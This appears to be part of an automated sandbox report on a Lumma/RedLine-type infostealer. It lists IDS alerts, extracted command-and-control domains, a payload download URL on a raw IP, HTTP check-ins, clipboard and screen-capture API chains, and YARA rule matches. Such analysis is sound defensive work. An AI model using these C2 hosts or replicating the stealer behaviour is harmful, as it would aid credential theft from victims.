                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, eax3_2_024B7797
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_024B54D1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, edi3_2_024AD4D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_024A554C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_024A6544
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_024CD557
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024AC528
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B552B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_024B559D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_024B55B3
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0249DA09
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0249EAA2
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0249CB7E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, di3_2_024B5BF7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024A4806
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_024C3897
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024A6907
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov eax, edx3_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_024B89C0
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_024CA9DE
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_024A5F79
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_024CCFC7
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_024B9C17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_024AEC17
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_024C6C3B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov esi, eax3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CAD19
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_024CCD87

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:63859 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:64353 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:54461 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:51288 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:56428 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:52796 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:64555 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:49493 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:62214 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49768 -> 23.55.153.106:443
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:16:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:15:01 GMTETag: "58600-6293abc281063"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-program
                  Source: Joe Sandbox ViewIP Address: 104.21.22.222 104.21.22.222
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49726 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49768 -> 23.55.153.106:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49759 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49722 -> 104.21.56.70:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                  Source: rHrG691f7q.exe, 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeM
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeT
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exef
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exef3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exel
                  Source: rHrG691f7q.exe, 00000000.00000003.4485117055.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623211072.0000000000AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeo3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exet3
                  Source: rHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeu
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/api
                  Source: 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/~
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                  Source: 1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433836788.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                  Source: 1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.6:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49759 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49768 version: TLS 1.2
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024C1942
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839

                  System Summary

                  Source: 00000003.00000002.2433571436.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024C2361
